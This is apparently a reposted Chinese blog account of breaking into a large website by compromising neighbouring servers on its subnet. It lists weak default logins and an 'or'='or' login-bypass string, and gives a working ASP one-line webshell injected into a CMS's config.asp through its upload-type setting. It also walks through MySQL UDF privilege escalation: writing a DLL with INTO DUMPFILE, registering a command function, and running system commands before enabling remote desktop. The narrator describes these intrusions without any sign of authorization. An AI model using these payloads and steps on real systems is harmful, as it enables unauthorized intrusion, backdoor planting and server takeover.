網絡入侵處置方法?網絡滲透中的一些細節和技巧後面做了一些補充 關于在phpmyadmin裡UDF提權的一些細節,今天小編就來聊一聊關于網絡入侵處置方法?接下來我們就一起去研究一下吧!
網絡滲透中的一些細節和技巧
後面做了一些補充 關于在phpmyadmin裡UDF提權的一些細節
大型站點滲透的思路要麼就是旁注,要麼就是攻陷C段服務器嗅探。因為獨立域名服務器,那麼就隻有從C段下手了。
用iisputscaner掃描有IIS寫權限漏洞的服務器。
發現有一台可以利用,随後拿到webshell,當我費盡千心萬苦提權拿到3389後,發現這台服務器跟目标不是一個網段,
中間用iisputscaner掃描開放web服務的機器。
對于80端口滲透我是這樣做的:
1、首先在url後面加admin回車,看是否能進入後台管理界面,然後嘗試弱口令
admin:admin
admin:admin888
admin:123456
可以嘗試'or'='or'等
注入的方式
登錄
2、還可以再url後面加login.asp,login.php等去嘗試找後台,如果無法登錄後台,或者後台地址根本找不到,
那麼我們可以嘗試去尋找這個網站用的是哪套WEB系統。有的站點頁面最下方直接就标準出來了,有的
在後台登錄界面有,有的根本無法很直接的判斷出是什麼系統。這個時候可以找這個網站比較有點特的URL地址,
比如某站點地址有admin/previlege/login.asp; 然後googel搜索,inurl:admin/previlege/login.asp;
這樣就能找到不少這樣的站點,看看其他站點是否标注了哪套WEB系統。當我們知道了站點的系統後就可以搜索這套系統被公布的漏洞,
0day,exp然後就可以較快的 有目的性的進行滲透。不然就隻有慢慢嘗試去尋找注入點,或者尋找上傳漏洞,比較費時間。
根據以上思想我花了一些時間看了好幾個機器終于利用某系統新出的漏洞拿到了shell,
然後PHP shell執行DOS命令竟然直接就可以添加系統賬戶。然後上傳udf.php ,
這個是提權用的,不過我發現他開3389功能不錯,給這台機器開了3389。
這個時候心情比較愉悅,因為可以對我的目标機器進行嗅探了。但萬萬讓我很郁悶的事又發生了,
我再次ping那個大型的安全站點時發現它的IP地址完全改變了,完全不是我一開始PING出來的那個地址了。
頓時 心情跌入低谷。這個時候我想要麼它是動态IP?真不知道 怎麼繼續了。于是就暫停去休息。
第二天繼續PING目标, 結果目标還是後面這個IP 不管了繼續從這個IP的C段入手,再找台機器 還是按上面的思路,最終嗅探目标。
不過後面進行的C段滲透比較艱難了,我機會1-255開放WEB的站點都看了,幾乎沒有哪個站點可以很快的
拿到SHELL ,于是昨天晚上用XSCAN出來掃一圈,發現如下:
1、有幾台FTP弱口令,但沒任何權限
2、有台FTP弱口令, 可以上傳文件,但不是WEB目錄;FTP也沒執行命令權限;
3、有台SQL若口令, 同樣沒任何權限
心中無比凄涼。
這個時候發現了一個服務器一個站點時cms3.0.0但搜索了公布的漏洞 都無法成功利用,同時還有套WEB系統,
放的是某**站點是ASP系統結構。直接點 管理 進入後台登錄界面 嘗試了幾次 最後以admin:123456登入後台。
後台我是翻來覆去的到處看,始終沒找到利用的地方。在後台 我的思路如下:
1、嘗試找到這是哪套系統。後台,管理界面都無法直接看出。隻是在登錄界面看源碼時看到是**學校管理系統9正式版。
于是搜索該系統可能被公布的漏洞,但一無所獲,也許這個系統比較冷僻 關注的人很少。
2、找上傳的地方,看是否有上傳漏洞。我在文章編輯裡找到有上傳的類型還挺多 還後HTML型。
可是無論我用抓包 修改文件名方式以及1.asp;.jpg方式漏洞都無法成功,并且上傳後系統自動重新命名。看來無法利用上傳漏洞。
3、有個數據庫備份 隻是備份隻能以MDB後綴,而且我點備份似乎看起來它并沒有備份可能系統有些問題。
4、嘗試把該套系統下載下來,在自己機器上看看,會不會有什麼可以滲透進去的地方。我還是看的上傳頁面
看看是否能繞過去格式限制。
程序先判斷是否在已有的允許的類型裡,如果不是 就直接返回錯誤;然後再過濾一道,後面這道覺得有點多餘。
這套系統共有6個上傳頁面,隻是每個都這樣的限制,看起來無法繞過了。
這時發現這個頁面頂端 有句 :<!--#include file="Inc/upload.asp"-->
然後就看看upload.asp,結果看到就是一個 無組件上傳類 。
隻是在INC這個目錄下 還有個config.asp就順便看看
在後台管理界面 網站屬性設置裡 有這些内容,記得當時
我在上傳類型裡添加了asp類型,添加成功了但是就是還無法上傳。
這時我想到的時 修改網站屬性的同時 就是把config.asp 的内容給改了。那麼我是不是可以吧一句話木馬寫進去?
于是就趕緊嘗試,直接 在 允許上傳類型後面加一句話木馬。這時我再打開config.asp發現内容
如下:
Const UpFileType="jpg|gif|png<%execute(request("3"))%>" '允許的上傳文件類型
看起來寫入成功了,然後馬上拿客戶端連接 提交 結果 失敗。
但想想 會不會是 前後 < >這些符号沒關閉好?
嘗試修改 config.asp 如下 :
Const UpFileType="jpg|gif|png"%> <%execute(request("3"))%> <% ' " '允許的上傳文件類型
把類型後面接一個%>把前面的閉合好,然後 插入一句話木馬 然後 加<% 後asp文件最後的%>對應
後面 接 ' 是吧 最後原有的"給注釋掉,
于是我先在自己系統搭建環境 進入後台 在類型後面 輸入"%> <%execute(request("3"))%> <% ' 如下圖
提交,然後 再看看config.asp文件:
嘗試連接一句話 shell 在 inc/config.asp
成功得到shell。
得到了後台shell後 發現沒什麼權限,這時我用wwwscan掃描下 web目錄看看有沒有什麼又用的東西。
發現可以不用密碼 直接登錄phpmyadmin後台,
一開始在後台翻來翻去找不到什麼又用的東西,找到php後台數據庫mysql密文密碼 也無法解密。
試圖用數據庫語句 into outfile 寫入一句話shell 但又不知道物理路徑,嘗試了網上公布的所有暴路徑的方式 都無法得到
也嘗試對一些目錄 loadfile 還是沒得到
後面想到udf提權就找了找這方面的資料:
《Windows環境下通過MySQL以SYSTEM身份執行系統命令》
《利用mysql上傳和執行文件》
《MYSQL中的UDF – Can’t open shared library 的研究》
主要有兩點思想:
第一:可以通過MySQL上傳二進制文件,例如自己編寫的UDF DLL;
第二:可以通過注冊UDF DLL中自寫的Function而執行任意命令。
自己構造mysql數據庫命令如下:
DROP TABLE IF EXISTS mix;
create table mix(data LONGBLOB);
INSERT INTO `mysql`.`mix` (`data`) VALUES(0x45…………..)(二進制數據省略)
SELECT data FROM mix INTO DUMPFILE "c:\\udf.dll";
drop table mix;
成功将 二進制文件udf.dll上傳到 服務器c盤目錄下。
1、 在phpmyadmin裡 如果表名前不帶數據庫名 會在生成的文件前多出半字節0。
2、 如果通過變量賦值 然後将變量插入表中 那麼最後生成的文件裡0字節 會變成\0。
最後終于 成功上傳了udf.dll,但是在執行
CREATE FUNCTION cmdshell RETURNS STRING SONAME 'C:udf.dll'
時提示無法共享庫,重新上傳又提示文件已經存在。 我猜想一定時被殺毒軟件攔截了。
隻留下cmdshell()函數。并且把cmdshell()函數改名 為windcmd()。
然後執行 CREATE FUNCTION windcmd RETURNS STRING SONAME 'C:udf.dll'
接着:
Select windcmd(“net user”)
服務器開了3389,到此拿下了這台服務器權限!
,更多精彩资讯请关注tft每日頭條,我们将持续为您更新最新资讯!